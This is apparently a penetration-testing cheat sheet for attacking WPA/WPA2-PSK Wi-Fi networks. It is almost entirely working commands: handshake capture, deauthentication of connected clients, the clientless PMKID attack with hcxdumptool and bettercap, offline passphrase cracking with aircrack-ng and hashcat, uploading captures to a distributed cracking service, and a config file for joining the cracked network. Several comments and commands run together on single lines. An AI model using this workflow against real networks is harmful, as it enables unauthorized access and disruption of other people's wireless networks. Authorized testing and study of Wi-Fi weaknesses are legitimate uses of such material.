Attacking WPA/WPA2-PSK
WPA/WPA2 Personal (Pre-Shared Key) networks can be attacked by capturing the 4-way handshake or a PMKID and cracking it offline. This section covers handshake capture, deauthentication, the clientless PMKID attack, cracking with Aircrack-ng and Hashcat, and connecting back to the network.
Capturing the 4-Way Handshake
Put the adapter in monitor mode (see Setup and Discovery), identify the target AP and channel, then capture the handshake, deauthenticating a client if needed to force a reconnection.
# Target the network on its channel and write a capturesudo airodump-ng -c <channel> --bssid AA:BB:CC:DD:EE:FF -w PSK wlan0monDeauthentication to Force a Handshake
# Deauthenticate clients so they reconnect and reveal the handshakesudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# Old-school 4-way handshake capture / deauth referenceairodump-ng -c 3 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0monaireplay-ng -0 2 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0monPMKID Attack (Clientless)
The PMKID attack recovers crackable material directly from the AP without waiting for a client handshake, and is often the preferred first approach.
hcxdumptool
# Test the card for at least two minutes (look for HIT values)sudo hcxdumptool -i wlan0 --do_rcascan
# Build a list of target APs to attackecho 'AA:BB:CC:DD:EE:FF' | tr -d ':' >> bssid.lst
# Launch the attack (filtered to the target list)sudo hcxdumptool -i wlan0 -o ~/work/capture.pcapng --filterlist_ap=bssid.lst --filtermode=2 --enable_status=1sudo hcxdumptool -i wlan0 -o ~/work/capture.pcapng --enable_status=1
# Set a specific channelsudo hcxdumptool -i wlan0 --enable_status=1 -c 6 --filterlist=bssid.lst --filtermode=2 -o ~/work/capture.pcapngBettercap PMKID
# Put the card in monitor mode, then associate to capture a PMKIDsudo bettercap -iface wlan0wifi.recon onset wifi.show.sort clients descset ticker.commands 'clear; wifi.show'set ticker.period 5ticker on
# Move to the target channel and associate / deauthwifi.recon.channel 1wifi.assoc allwifi.assoc AA:BB:CC:DD:EE:FFwifi.deauth AA:BB:CC:DD:EE:FFCracking Captured Material
The current Hashcat workflow uses mode 22000 (the unified hc22000 format produced by cap2hashcat). Aircrack-ng can crack the .cap directly. Ensure the SSID is present in the wordlist context for PMKID/handshake cracking.
Aircrack-ng
sudo aircrack-ng -a 2 -w <wordlist> capture.capaircrack-ng -w /usr/share/wordlists/wifite.txt -e CorpWiFi -b AA:BB:CC:DD:EE:FF capture-04.capHashcat (current: mode 22000)
# Convert a capture to the hc22000 format# https://hashcat.net/cap2hashcat/
hashcat -m 22000 capture.hc22000 /usr/share/wordlists/rockyou.txtLegacy Hashcat Modes and Conversions
The 2500 (hccapx handshake) and 16800 (PMKID) modes below, and the cap2hccapx / hcxpcaptool conversions, have been superseded by mode 22000 and cap2hashcat above. They are retained for older captures and workflows.
# Legacy: convert to hccapx (superseded by cap2hashcat)# https://hashcat.net/cap2hccapx/
# Legacy: handshake cracking (mode 2500)hashcat -m 2500 -a 3 -w 3 capture.hccapx '?d?d?d?d?d?d?d?d'hashcat -m 2500 C:\path\to\hash.txt C:\path\to\wordlists
# Legacy: PMKID conversion with hcxpcaptoolsudo hcxpcaptool -z hash.txt ~/work/capture.pcapngsudo hcxpcaptool -E essidlist -I identitylist -U usernamelist -z hashcat.16800 ~/work/capture.pcapng
# Legacy: PMKID cracking (mode 16800)hashcat -m 16800 hash.txt /usr/share/wordlists/rockyou.txt -r ~/tools/rules/d3adhob0.ruleDistributed Cracking (wpa-sec)
# Submit captures to the distributed wpa-sec cracking service# https://wpa-sec.stanev.org/?my_nets# Configure your account key where required: <WPA_SEC_API_KEY>Connecting to the Network
Once the PSK is recovered, connect back to confirm access.
# Create a configuration filenano wireless.conf
network={ ssid="CorpWiFi" key_mgmt=WPA-PSK psk="<passphrase>" proto=RSN}
# Connect to the APsudo wpa_supplicant -i wlan0 -c wireless.confsudo wpa_supplicant -D nl80211 -i wlan0 -c wireless.conf
# Obtain an IP addresssudo dhclient wlan0 -v


